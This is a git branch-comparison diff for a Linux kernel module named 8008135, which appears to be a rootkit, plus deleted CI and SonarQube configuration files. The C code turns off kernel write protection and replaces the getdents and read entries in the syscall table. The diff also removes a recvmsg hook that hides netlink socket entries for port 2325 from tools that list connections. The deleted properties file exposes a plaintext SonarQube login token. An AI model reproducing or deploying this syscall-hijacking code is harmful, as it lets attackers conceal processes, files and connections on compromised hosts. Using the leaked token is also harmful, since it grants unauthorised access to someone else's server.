Compare commits
No commits in common. "master" and "dev_vlr" have entirely different histories.
26
Jenkinsfile
vendored
26
Jenkinsfile
vendored
@ -1,26 +0,0 @@
|
|||||||
#!/usr/bin/env groovy
|
|
||||||
|
|
||||||
pipeline {
|
|
||||||
|
|
||||||
agent any
|
|
||||||
|
|
||||||
stages{
|
|
||||||
stage('checkout VCS'){
|
|
||||||
steps{
|
|
||||||
checkout scm
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
stage('compile'){
|
|
||||||
steps{
|
|
||||||
sh 'echo "fake-compiling..."'
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
stage('deploySONAR'){
|
|
||||||
steps{
|
|
||||||
sh 'sonar-scanner'
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
@ -1,187 +0,0 @@
|
|||||||
#*******************************************************************************
|
|
||||||
#
|
|
||||||
# FILE: sonar-project.properties
|
|
||||||
#
|
|
||||||
# USAGE:
|
|
||||||
#
|
|
||||||
# DESCRIPTION:
|
|
||||||
#
|
|
||||||
# OPTIONS: -
|
|
||||||
# REQUIREMENTS: SonarQube/SonarCloud
|
|
||||||
# BUGS: Hoffentlich keine, bei Problemen bitte kontaktieren
|
|
||||||
# NOTES:
|
|
||||||
# AUTHOR: vlr
|
|
||||||
# ORGANIZATION: Jan Koerner Enterprises
|
|
||||||
# CREATED: 30.01.2019 22:22:55
|
|
||||||
# REVISION: 1
|
|
||||||
#*******************************************************************************
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# Diese Datei ist das Äquivalent der "Jenkins"- oder "Dockerfile" für SonarQube
|
|
||||||
# Anhand in dieser Datei spezifizierter Parameter wird das Entwicklungsprojekt
|
|
||||||
# von SonarQube analysiert
|
|
||||||
|
|
||||||
#*** Allgemeines *************************************************************
|
|
||||||
|
|
||||||
|
|
||||||
# Host URL, muss angegeben werden
|
|
||||||
sonar.host.url=https://sonar.fuxxbau.net
|
|
||||||
|
|
||||||
# Default: <url> (maven)
|
|
||||||
sonar.links.homepage=https://www.fuxxbau.net
|
|
||||||
# Default: <ci-management> (maven)
|
|
||||||
sonar.links.ci=http://jenkins.fuxxbau.net
|
|
||||||
|
|
||||||
# Default: System Encoding
|
|
||||||
sonar.sourceEncoding=UTF-8
|
|
||||||
|
|
||||||
# sonar.organization=highQ
|
|
||||||
#*******************************************************************************
|
|
||||||
|
|
||||||
#*** Debug *******************************************************************
|
|
||||||
# M\"ogliche Werte: DEBUG, INFO
|
|
||||||
# Default: INFO
|
|
||||||
sonar.log.level=DEBUG
|
|
||||||
|
|
||||||
# Ausgabe aller spezifizierten Einstellungen zur Scanner API in ein File
|
|
||||||
# sonar.scanner.dumpToFile=dump.txt
|
|
||||||
|
|
||||||
# Stelle, an die vom Scanner die "report-task.txt" geschrieben wird
|
|
||||||
# Default: sonar.working.directory
|
|
||||||
# sonar.scanner.metadataFilePath=
|
|
||||||
|
|
||||||
# Stelle in Logs dar, an welchen Stellen der Analyzer wv Zeit ben\"otigt
|
|
||||||
# Logs zu finden in workingDir/profiling/moduleKey-profiler.xml
|
|
||||||
# workingDir=.sonar/profiling (sonarscanner)
|
|
||||||
# bzw target/sonar/profiling (sonarscanner for maven)
|
|
||||||
# Default: false
|
|
||||||
# sonar.showProfiling=
|
|
||||||
# NOTE: There is the potential for this setting to expose sensitive information
|
|
||||||
# such as passwords if they are stored as server-side environment variables.
|
|
||||||
# sonar.verbose=
|
|
||||||
#*******************************************************************************
|
|
||||||
|
|
||||||
#*** Projekt *****************************************************************
|
|
||||||
|
|
||||||
# Der einzigartige Key des Projekts (Maven Default: <groupId>:<artifactId>
|
|
||||||
# Erlaubt sind hier Zahlen, Buchstaben, "-","_",".",":"
|
|
||||||
# mindestens ein char muss keine Zahl sein
|
|
||||||
# muss angegeben sein, entweder durch maven oder manuell
|
|
||||||
sonar.projectKey=JKE-8008135
|
|
||||||
|
|
||||||
# Hier kann entweder Login über einen Nutzer erstellt werden oder \"uber
|
|
||||||
# ein Login-Token (Weboberfläche -> My Account -> Security -> Generate Token)
|
|
||||||
# Wenn sonar.password leer ist wird sonar.login als Auth-Token interpretiert
|
|
||||||
# Alternativ: Anyone-Gruppe Analyse Rechte zuweisen (Serverseitig)
|
|
||||||
sonar.login=f116f5c7835d1a62d364355fb24e7ca8e416575e
|
|
||||||
# sonar.password=
|
|
||||||
|
|
||||||
# Name, der in der Weboberfläche angezeigt wird
|
|
||||||
sonar.projectName=JKE-8008135
|
|
||||||
# Default: <version> (maven), sonst "not provided"
|
|
||||||
# sonar.projectVersion=
|
|
||||||
# Default: <description> (maven)
|
|
||||||
# sonar.projectDescription=
|
|
||||||
|
|
||||||
# Kann nicht früher als das letzte Datum der Analyse dieses Projekts in DB sein
|
|
||||||
# Default:Now. Angabe in yyyy-MM-dd
|
|
||||||
# sonar.projectDate=
|
|
||||||
|
|
||||||
# Kann verwendet werden um zu bestimmen dass die Analyse des Projekts an
|
|
||||||
# anderer Stelle stattfindet
|
|
||||||
# ben\"otigt Schreibrechte f\"ur Erstellung von sonar.working.directory
|
|
||||||
# Default=./
|
|
||||||
# sonar.projectBaseDir=
|
|
||||||
|
|
||||||
#*******************************************************************************
|
|
||||||
|
|
||||||
|
|
||||||
# Max Zeit um auf Webservice Call zu warten (in sec, Default 60)
|
|
||||||
# Nützlich um auf Timeouts zu reagieren
|
|
||||||
# sonar.ws.timeout=
|
|
||||||
|
|
||||||
#*** SCM *********************************************************************
|
|
||||||
|
|
||||||
# Das Plugin, das von SonarQube für das Abfragen von SCM Daten verwendet wird
|
|
||||||
# Default: Autodetect (-> svn, wenn .svn Ordner hier existiert; git wenn .git)
|
|
||||||
sonar.scm.provider=git
|
|
||||||
|
|
||||||
# Standardm\"assig werden nur bei ver\"anderten Files blame Informationen geladen
|
|
||||||
# Wenn die Daten outdatet sind, kann man hier auf "true" stellen um upzudaten
|
|
||||||
# sonar.scm.forceReloadAll=
|
|
||||||
|
|
||||||
# Standardm\"assig werden Dateien die vom SCM ignoriert werden (bsp .gitignore)
|
|
||||||
# bei der Analyse ebenfalls ignoriert.
|
|
||||||
# Wenn man diesen Wert hier auf true setzt, disabled man dieses Feature
|
|
||||||
# Default: false
|
|
||||||
# sonar.scm.exclusions.disabled=
|
|
||||||
|
|
||||||
# Überschreiben der Revision
|
|
||||||
# Default: Provided von CI oder von source geraten
|
|
||||||
# sonar.scm.revision=
|
|
||||||
|
|
||||||
# Default: <issueManagement><url> (maven)
|
|
||||||
# sonar.links.issue=
|
|
||||||
|
|
||||||
# Default: <scm><url> (maven)
|
|
||||||
# sonar.links.scm=
|
|
||||||
|
|
||||||
# Comma Seperated Pfadliste für Generic Issue Reports
|
|
||||||
# sonar.externalIssuesReportPaths=
|
|
||||||
|
|
||||||
#*******************************************************************************
|
|
||||||
|
|
||||||
|
|
||||||
#*** Build *******************************************************************
|
|
||||||
|
|
||||||
# Wenn weder sonar.sources noch sonar.tests gegeben: BaseDir(=./)
|
|
||||||
# Default: Wird aus Build Sys gelesen (Maven, Gradle, MSBuild).
|
|
||||||
sonar.sources=.
|
|
||||||
# Default: Wird aus Build Sys gelesen (Maven, Gradle, MSBuild). Sonst leer
|
|
||||||
# sonar.tests=
|
|
||||||
|
|
||||||
# Habe ich nicht ganz einordnen k\"onnen, wof\"ur.
|
|
||||||
# Offizieller Text:
|
|
||||||
# The string passed with this property will be stored with the analysis and available in the results of api/project_analyses/search, thus allowing you to later identify a specific analysis and obtain its ID for use with api/project_analyses/set_baseline.
|
|
||||||
# sonar.buildString=
|
|
||||||
|
|
||||||
#*******************************************************************************
|
|
||||||
|
|
||||||
|
|
||||||
#*** Analyse *****************************************************************
|
|
||||||
|
|
||||||
# Default:.scannerwork
|
|
||||||
# sonar.working.directory=
|
|
||||||
|
|
||||||
# Hinzuf\"ugen von key-value Paaren zum Analysekontext (-> Webhooks)
|
|
||||||
# sonar.analysis.[Key001]=
|
|
||||||
# sonar.analysis.[Key002]=
|
|
||||||
|
|
||||||
# Standardm\"assig gilt ein Code als dupliziert wenn mind. 100 Token des Codes
|
|
||||||
# gleich sind (über 10 Zeilen hinweg)
|
|
||||||
# Kann sprachenspezifisch überschrieben werden
|
|
||||||
# sonar.cpd.${language}.minumumtokens=
|
|
||||||
# sonar.cpd.${language}.minimumLines=
|
|
||||||
|
|
||||||
|
|
||||||
# Diese Parameter sorgen daf\"ur, dass Code zwischen Bl\"ocken nicht analysiert
|
|
||||||
# wird. Leider werden diese Parameter nicht offiziell unterst\"utzt
|
|
||||||
# https://community.sonarsource.com/t/how-to-set-sonar-issue-ignore-block-in-sonar-project-properties/10943/6
|
|
||||||
# Offiziell unterst\"utzt wird nur eine globale Einstellung im Webinterface
|
|
||||||
# siehe:
|
|
||||||
# Administration->Configuration->General->Analysis Scope->Ignore Issues in Blocks
|
|
||||||
# Wird von einem SonarQube Entwickler als "Hack" bezeichnet, was ich nicht
|
|
||||||
# verstehe, es ist mmN legitim, hier Proj Spezifische Settings zu haben (oder zmd: zu haben wollen).
|
|
||||||
# Wahrscheinlich ist es auch m\"oglich, andere Einstellungen die im WebUI
|
|
||||||
# zu finden sind hier zu "hacken"
|
|
||||||
# sonar.issue.ignore.block=ignore-generated
|
|
||||||
# sonar.issue.ignore.block.ignore-generated.beginBlockRegexp=DA-ELSE
|
|
||||||
# sonar.issue.ignore.block.ignore-generated.endBlockRegexp=DA-END
|
|
||||||
|
|
||||||
# Hier ein weiteres Beispiel, bei dem das ganze file von Analyse ausgeschlossen
|
|
||||||
# wird, wenn "@sonar-disable" im File vorkommt
|
|
||||||
# sonar.issue.ignore.allfile=ignore-file
|
|
||||||
# sonar.issue.ignore.allfile.ignore-file.fileRegexp=@sonar-disable
|
|
||||||
|
|
||||||
#*******************************************************************************
|
|
@ -23,6 +23,7 @@
|
|||||||
*******************************************************************************/
|
*******************************************************************************/
|
||||||
#include "8008135.h"
|
#include "8008135.h"
|
||||||
|
|
||||||
|
/*******************************************************************************/
|
||||||
|
|
||||||
/*** FUNCTION ****************************************************************
|
/*** FUNCTION ****************************************************************
|
||||||
* NAME: 8008135_init
|
* NAME: 8008135_init
|
||||||
@ -34,13 +35,11 @@ static int __init init_8008135(void) {
|
|||||||
|
|
||||||
sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents];
|
sys_getdents_orig = (sys_getdents_ptr)((void**)sys_call_table)[__NR_getdents];
|
||||||
sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read];
|
sys_read_orig = (sys_read_ptr)((void**)sys_call_table)[__NR_read];
|
||||||
sys_recvmsg_orig = (void *) sys_call_table[__NR_recvmsg];
|
|
||||||
|
|
||||||
wprotectionoff();
|
wprotectionoff();
|
||||||
|
|
||||||
sys_call_table[__NR_getdents] = sys_getdents_new;
|
sys_call_table[__NR_getdents] = sys_getdents_new;
|
||||||
sys_call_table[__NR_read] = sys_read_fake;
|
sys_call_table[__NR_read] = sys_read_fake;
|
||||||
sys_call_table[__NR_recvmsg] = my_recvmsg_syscall;
|
|
||||||
|
|
||||||
wprotectionon();
|
wprotectionon();
|
||||||
|
|
||||||
@ -64,7 +63,6 @@ static void __exit exit_8008135(void) {
|
|||||||
|
|
||||||
sys_call_table[__NR_getdents] = sys_getdents_orig;
|
sys_call_table[__NR_getdents] = sys_getdents_orig;
|
||||||
sys_call_table[__NR_read] = sys_read_orig;
|
sys_call_table[__NR_read] = sys_read_orig;
|
||||||
sys_call_table[__NR_recvmsg] = sys_recvmsg_orig;
|
|
||||||
|
|
||||||
wprotectionon();
|
wprotectionon();
|
||||||
}
|
}
|
||||||
|
@ -27,7 +27,6 @@
|
|||||||
*******************************************************************************/
|
*******************************************************************************/
|
||||||
|
|
||||||
sys_read_ptr sys_read_orig;
|
sys_read_ptr sys_read_orig;
|
||||||
original_recvmsg_syscall sys_recvmsg_orig;
|
|
||||||
|
|
||||||
/*******************************************************************************/
|
/*******************************************************************************/
|
||||||
|
|
||||||
@ -107,79 +106,3 @@ asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
|
|||||||
// return number of bytes read
|
// return number of bytes read
|
||||||
return result;
|
return result;
|
||||||
}
|
}
|
||||||
|
|
||||||
/* Function that replaces the original `recvmsg` syscall. Initially, it calls the original
|
|
||||||
`recvmsg` which fills the given msg buffer. We realize whether we are reading from a netlink
|
|
||||||
socket with the help of some netlink utility macros. If a netlink socket is being used, we
|
|
||||||
iterate through the inet diag msg structs (each prepended by a nlmsghdr) and compare the
|
|
||||||
source and destination ports with our list of hidden ones. In order to hide an entry we copy
|
|
||||||
the remaining entries over it and adjust the data length which is returned to the user. */
|
|
||||||
|
|
||||||
asmlinkage ssize_t my_recvmsg_syscall(int sockfd, struct user_msghdr __user *msg, unsigned flags)
|
|
||||||
{
|
|
||||||
long ret;
|
|
||||||
struct nlmsghdr *nlh;
|
|
||||||
long count;
|
|
||||||
int found;
|
|
||||||
char *stream;
|
|
||||||
int offset;
|
|
||||||
int i;
|
|
||||||
struct inet_diag_msg *r;
|
|
||||||
int port;
|
|
||||||
/* Call original `recvmsg` syscall */
|
|
||||||
ret = sys_recvmsg_orig(sockfd, msg, flags);
|
|
||||||
|
|
||||||
/* Some error occured. Don't do anything. */
|
|
||||||
if (ret < 0)
|
|
||||||
return ret;
|
|
||||||
|
|
||||||
/* Extract netlink message header from message */
|
|
||||||
nlh = (struct nlmsghdr *)(msg->msg_iov->iov_base);
|
|
||||||
|
|
||||||
/* Number of bytes remaining in message stream */
|
|
||||||
count = ret;
|
|
||||||
|
|
||||||
/* Set flag specifying whether message contains data to be masked */
|
|
||||||
found = 1;
|
|
||||||
|
|
||||||
/* NLMSG_OK: This macro will return true if a netlink message was received. It
|
|
||||||
essentially checks whether it's safe to parse the netlink message (if indeed
|
|
||||||
is a netlink message) using the other NLMSG_* macros. */
|
|
||||||
while (NLMSG_OK(nlh, count)) {
|
|
||||||
|
|
||||||
if (found == 0)
|
|
||||||
/* NLMSG_NEXT: Many netlink protocols have request messages that result
|
|
||||||
in multiple response messages. In these cases, multiple responses will
|
|
||||||
be copied into the `msg` buffer. This macro can be used to walk the
|
|
||||||
chain of responses. Returns NULL in the event the message is the last
|
|
||||||
in the chain for the given buffer. */
|
|
||||||
nlh = NLMSG_NEXT(nlh, count);
|
|
||||||
|
|
||||||
r = NLMSG_DATA(nlh);
|
|
||||||
port = ntohs(r->id.idiag_sport);
|
|
||||||
if(port == 2325){
|
|
||||||
/* Message contains data to be masked */
|
|
||||||
found = 1;
|
|
||||||
}else{
|
|
||||||
found = 0;
|
|
||||||
continue;
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
stream = (char *) nlh;
|
|
||||||
|
|
||||||
/* NLMSG_ALIGN: This macro accepts the length of a netlink message and rounds it
|
|
||||||
up to the nearest NLMSG_ALIGNTO boundary. It returns the rounded length. */
|
|
||||||
offset = NLMSG_ALIGN((nlh)->nlmsg_len);
|
|
||||||
|
|
||||||
/* Copy remaining entries over the data to be masked */
|
|
||||||
for (i=0 ; i<count ; i++)
|
|
||||||
stream[i] = stream[i + offset];
|
|
||||||
|
|
||||||
/* Adjust the data length */
|
|
||||||
ret -= offset;
|
|
||||||
}
|
|
||||||
|
|
||||||
return ret;
|
|
||||||
}
|
|
||||||
|
|
||||||
|
@ -36,27 +36,23 @@
|
|||||||
#include <linux/version.h>
|
#include <linux/version.h>
|
||||||
#include <net/tcp.h>
|
#include <net/tcp.h>
|
||||||
#include <net/udp.h>
|
#include <net/udp.h>
|
||||||
#include <linux/inet_diag.h> /* Needed for ntohs */
|
|
||||||
|
|
||||||
|
|
||||||
#define __NR_read 0
|
#define __NR_read 0
|
||||||
#define __NR_recvmsg 47
|
|
||||||
|
|
||||||
|
|
||||||
typedef asmlinkage long (*sys_read_ptr)(unsigned int fd,
|
typedef asmlinkage long (*sys_read_ptr)(unsigned int fd,
|
||||||
char __user *buf,
|
char __user *buf,
|
||||||
size_t count);
|
size_t count);
|
||||||
typedef asmlinkage ssize_t (*original_recvmsg_syscall)(int, struct user_msghdr __user *, unsigned);
|
|
||||||
|
|
||||||
|
|
||||||
/**** var **********************************************************************
|
/**** var **********************************************************************
|
||||||
*******************************************************************************/
|
*******************************************************************************/
|
||||||
|
|
||||||
extern sys_read_ptr sys_read_orig;
|
extern sys_read_ptr sys_read_orig;
|
||||||
|
|
||||||
extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
|
extern asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
|
||||||
size_t count);
|
size_t count);
|
||||||
|
|
||||||
extern original_recvmsg_syscall sys_recvmsg_orig;
|
|
||||||
extern asmlinkage ssize_t my_recvmsg_syscall(int, struct user_msghdr __user *, unsigned);
|
|
||||||
|
|
||||||
#endif
|
#endif
|
||||||
|
Loading…
Reference in New Issue
Block a user